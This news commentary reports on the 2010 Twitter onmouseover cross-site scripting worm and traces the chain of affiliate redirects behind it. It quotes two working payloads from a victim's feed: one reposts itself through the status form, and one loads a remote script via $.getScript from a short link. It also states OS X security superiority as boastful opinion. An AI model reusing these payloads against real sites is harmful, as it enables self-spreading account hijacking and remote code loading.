Link Shortener Exploit Cripples Twitter

'Twas fun but it might be over now.

Get It Try It

SAN FRANCISCO (Rixstep) — There's been another setback for those dilettantes of the derring-do readying a rollout of a new version of their realtime social software.

There's been an annoying exploit that messes with everyone's Twitter feeds.

Graham Clueless of Sophos seems to have investigated the bug/exploit from Apple's platform (a move that took all too long) and Mashable have reported on it but Rixstep have not seen the exploit work on OS X.

Some people report bad things already on 'mouse over' ops. And it might be difficult to remove the corrupted tweets unless people get over to third party apps that run on the local machine.

Mrs Brown You've Got a Lovely Tweeter

This is what Sarah Brown's Twitter feed looked like earlier today - typical for what happened.



The difference - YMMV - is that at least FF and Safari on OS X didn't seem to make viable links out of the mess. Another difference of course is that OS X is infinitely more impervious at system level to attacks like this anyway.

http://is.gd/fl5d3

Mrs B chose TweetDeck (Bad Decision™) for the time being. The Twitter crew can have already fixed their Ruby this Tuesday.

Here's what Sarah's two corrupted links looked like.

http://a.no/@%22onmouseover=%22;$('textarea:first').val(this.innerHTML);$('.status-update-form').submit();%22class=%22modal-overlay%22/

http://t.co/@%22style=%22font-size:999999999999px;%22onmouseover=%22$.getScript('http:\u002f\u002fis.gd\u002ffl5d3')%22/

The latter part of the second tweet is a URL crafted with Unicode escapes. The redirect has already been shut down by is.gd.



The redirect led to a URL that generated a 302 - another redirect.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://click.dtiserv2.com/Click144/88-23-2277">here</A>.<P>
</BODY></HTML>

That redirect in typical fashion leads to yet another redirect.

Please direct your browser to: http://click.d2pass.com?
md5=e9aaa38a37ac8b87fe86c3d5a91673d5&r;=http%3A%2F%2Faffiliate.dtiserv.com%2Flink
%2Findex.html&popup;%20window=88-23-2277.1287670295&dtiAff2;=88-2277.1287670295
&dtiFromSite;=23.1287670295&_c=144-88-23-2277.1287670295

Or unescaped:

Please direct your browser to: http://click.d2pass.com?
md5=e9aaa38a37ac8b87fe86c3d5a91673d5&r;=http://affiliate.dtiserv.com/link
/index.html&popup; window=88-23-2277.1287670295&dtiAff2;=88-2277.1287670295
&dtiFromSite;=23.1287670295&_c=144-88-23-2277.1287670295

Somebody seemed to be trying to make quick pocket change on click-throughs (and possibly more on Windows).

Use a third party app to connect to Twitter to clean your corrupted tweets; preferably do not use Windows when connecting to Twitter; preferably do not use Windows at all.

But that last bit you should already understand.